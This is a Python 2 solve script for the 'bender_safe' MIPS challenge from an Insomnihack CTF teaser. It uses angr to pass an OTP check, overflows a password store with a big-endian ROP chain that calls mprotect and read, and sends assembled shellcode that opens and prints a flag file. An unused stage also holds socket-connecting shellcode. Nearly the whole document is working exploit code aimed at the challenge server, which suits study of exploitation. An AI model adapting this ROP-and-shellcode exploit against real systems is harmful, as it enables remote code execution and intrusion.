# CTF solve script for the MIPS (big-endian) challenge binary ./bender_safe.
# Python 2 syntax throughout: print statements, backtick repr, list-returning map().
# Flow, as far as the code below shows:
#   1. do_otp()      -- answers the challenge/response prompt by symbolic execution (angr)
#   2. add_passwd()  -- sends a list of "passwords" whose last entries carry a ROP chain
#   3. a second stage of assembled MIPS code (stage2) is sent and its output read back
# External dependencies: phun (Remote I/O plus p16/p32 packing; fmt='>' = big-endian),
# angr, and keystone (imported lazily inside asm()).  None of these are stdlib.
import phun
import angr
import socket

# Addresses angr must steer away from during exploration (the avoid= set in do_otp).
# Presumably the failure/exit paths of the OTP checker -- confirm against the binary.
bad_addreses = (0x0401DDC,0x0401F2C,0x04020C4,0x0402264,0x0402418,0x04024B0, 0x0402650,0x04026E8,0x04028B4,0x0402A84,0x0402C44,0x0402CDC)

def do_otp(chall):
    """Return the answer bytes the binary expects for the OTP challenge string `chall`.

    Loads ./bender_safe in angr (no shared libraries), writes `chall` at chall_addr and
    eight symbolic bytes at asnwr_addr, starts a blank state at 0x401C50 with a0/a1
    pointing at those two buffers, and explores until 0x402D0C is reached while avoiding
    bad_addreses.  The concretised 9-byte answer buffer is returned as a str (only 8
    bytes were made symbolic; the 9th is whatever the blank state holds there).

    Raises IndexError if no path reaches the find address (pg.found is empty).
    NOTE(review): state.se, path_group and any_str are legacy angr APIs; current angr
    spells these state.solver, simulation_manager and solver.eval.
    """
    chall_addr = 0x04A5B98
    asnwr_addr = 0x04A5C10
    p = angr.Project('./bender_safe',load_options={'auto_load_libs': False})
    state = p.factory.blank_state(addr=0x401C50)
    # Py2 map() returns a list; the index-based store below relies on that.
    chall_s = map(lambda x:state.se.BVV(ord(x),8),chall)
    ans_s = []
    # Side-effect comprehension: stores each concrete challenge byte; `x` itself is unused.
    x = [ state.memory.store(chall_addr+i,chall_s[i]) for i in range(len(chall_s)) ]
    for i in range(8):
        a = state.se.BVS('a%d'%i,8)
        ans_s.append(a)
        state.memory.store(asnwr_addr+i,a)
    # MIPS o32 calling convention: first two arguments in a0/a1.
    state.regs.a0 = chall_addr
    state.regs.a1 = asnwr_addr
    pg = p.factory.path_group(state)
    pg.explore(find=(0x402D0C,),avoid=bad_addreses)
    s = pg.found[0].state
    return s.se.any_str(s.memory.load(asnwr_addr, 9))

def menu(r,n):
    """Consume the menu text through the '4. Exit' line plus two more lines, then send choice n."""
    r.read("4. Exit")
    r.read("\n")
    r.readline()
    r.readline()
    r.sendline(str(n))

def view_passwd(r,max):
    """Select menu item 1 and print up to `max` stored password entries (debug helper).

    Not called by the main flow below.  NOTE(review): the parameter name shadows the
    builtin max(); harmless here but worth renaming.
    """
    menu(r,1)
    print r.read(1024)
    for _ in range(max):
        r.read("Password ")
        print `r.read(":").strip()`
        print `r.readline()`

def add_passwd(r,x,passes):
    """Select menu item 2, announce `x` entries, then write each element of `passes` raw.

    r.write() is used (not sendline), so each entry is sent exactly as given.
    """
    menu(r,2)
    r.read(" : ")
    r.sendline(str(x))
    # Echoes the server's line; the read up to 'line ' is part of the same print here
    # (layout reconstructed -- it may originally have been a separate statement).
    print '[*]',r.readline(), r.read('line ')
    for p in passes:
        r.write(p)

def asm(script):
    """Assemble `script` as MIPS32 big-endian with keystone and return the raw bytes as a str."""
    import keystone as _ks
    k = _ks.Ks(_ks.KS_ARCH_MIPS,_ks.KS_MODE_MIPS32+ _ks.KS_MODE_BIG_ENDIAN)
    return ''.join(map(chr,k.asm(script)[0]))

def stage2():
    """Return (second-stage code, 17): read a file and echo it to fd 1.

    $s0 = ~(-2) = 1 (stdout).  Syscall numbers are MIPS o32 (4000 + Linux number):
    0xfa5 open, 0xfa3 read, 0xfa4 write.  The path argument (0x4a5060) is expected to
    point at the "./flag2.txt" string appended after the code; the buffer at 0x4a6000
    is reused for read and write.  The final teqi on a zeroed register always traps,
    which is how the stage terminates.  The 17 is the line count the caller reads back.
    """
    sh=asm('''addiu $t9, $zero, -2
not $s0, $t9
addiu $a1, $zero, 0
li $a0, 0x4a5060
ori $v0, $zero, 0xfa5
syscall 0x40404
move $s1, $v0
li $t0, 0x4a6000
addiu $a2, $zero, 0x400
move $a1, $t0
move $a0, $s1
ori $v0, $zero, 0xfa3
syscall 0x40404
li $t0, 0x4a6000
addiu $a2, $zero, 0x400
move $a1, $t0
move $a0, $s0
ori $v0, $zero, 0xfa4
syscall 0x40404
move $t0, $zero
teqi $t0, 0
''')
    sh+="./flag2.txt\x00"
    return sh,17

def stage3():
    """Return (alternative second-stage code, 7); NOT used by the main flow below.

    Creates a socket (4183) and connects (4170) it to the 16-byte sockaddr appended after
    the code (AF_INET, port 31337, 127.0.0.1 as written), receives into 0x4a6000 (4175),
    sends the 4-byte value built in $t3 (4178), receives again, writes the buffer to
    fd 1 ($s0 = ~(~1) = 1, syscall 4004) and traps.  $s5 holds the 1024-byte buffer size.
    """
    sh=asm('''
li $t9, ~1
not $s0, $t9
li $s5,1024
li $a1,2
li $a0,2
move $a2,$zero
move $a3,$zero
ori $v0,$zero,4183
syscall 0x40404
move $s1,$v0
li $a2,16
li $a1, 0x4a50c0
move $a0,$s1
ori $v0,$zero,4170
syscall 0x40404
li $t0, 0x4a6000
move $a2,$s5
move $a1,$t0
move $a0,$s1
ori $v0, $zero, (4175)
syscall 0x40404
li $t3, 0x430d0909
addiu $t3,0x101
sw $t3, -512($sp)
li $a2,4
addu $a1,$sp,-512
move $a0,$s1
ori $v0, $zero, (4178)
syscall 0x40404
li $t0, 0x4a6000
move $a2,$s5
move $a1,$t0
move $a0,$s1
ori $v0, $zero, (4175)
syscall 0x40404
li $t0, 0x4a6000
move $a2,$s5
move $a1,$t0
move $a0,$s0
ori $v0, $zero, (4004)
syscall 0x40404
move $t0,$zero
teqi $t0,0
''')
    # sockaddr_in, padded to 16 bytes: family 2, port 31337, then the IPv4 address.
    sh +=(phun.p16(2,31337,fmt='>') + socket.inet_pton(2, '127.0.0.1')).ljust(16,"\x00")
    return sh,7

# ---- main flow -----------------------------------------------------------------
sh,cnt=stage2()
print '[+] shellcode compiled - size:%d' % len(sh)
# Hard-coded addresses inside the (non-PIE, as the script assumes) binary: mprotect and
# read entry points, and a page-aligned writable region that becomes the stage-2 buffer.
mprotect=0x041E8BC
read = 0x04015DC
addr = 0x04A59A0&~0xfff
# NOTE(review): hard-coded remote endpoint and no timeout on any read -- a silent stall
# here hangs the script rather than failing.
r = phun.Remote('bender_safe.teaser.insomnihack.ch', 31337)
r.read(': \n')
chall=r.readline().strip()
r.write(do_otp(chall))
r.read('HiHiHi!\n')
print '[+] otp cleared'
# ROP chain: filler runs (A..E) interleaved with big-endian words that are, as far as the
# names show, gadget addresses and their saved-register arguments.  The mprotect call
# uses 7 (presumably PROT_READ|PROT_WRITE|PROT_EXEC) on `addr`, then read(0, addr, len(sh))
# pulls the second stage into that region before jumping to it.  Offsets are binary-specific.
p0 = "\x00"*3 + phun.p32(0x046B39C,fmt='>')
p0 += "A"*0x18 + phun.p32(addr,0x040F434,fmt='>')
p0 += "B"*0x20 + phun.p32(1024*4,0,0,0x046DFFC,fmt='>')
p0 += "C"*0x33 + phun.p32(0,mprotect,7,read,0x041E994,fmt='>')
p0 += "D"*(0x1c-5) + phun.p32(0,0,0,0x044F220,fmt='>')
p0 += "E"*0x1c + phun.p32(0,len(sh),addr,read,0x0476F04 ,fmt='>')
# p0 is padded to exactly three 102-byte entries, so 1 + 9 + 3 = 13 matches the count below.
p0 = p0.ljust(3*102,"X")
print '[+] rop setted up'
add_passwd(r,13,["\n"] + ["\x00"*102]*9 +[p0])
# Choosing Exit is where the script expects the chain to run: the very next write is
# the second stage, consumed by the read() in the chain.
menu(r,4)
print '[+] enojoy your rce!'
r.write(sh)
r.read("--\n ")
print '[+] here is your flag'
print '',r.readlines(cnt)
r.close()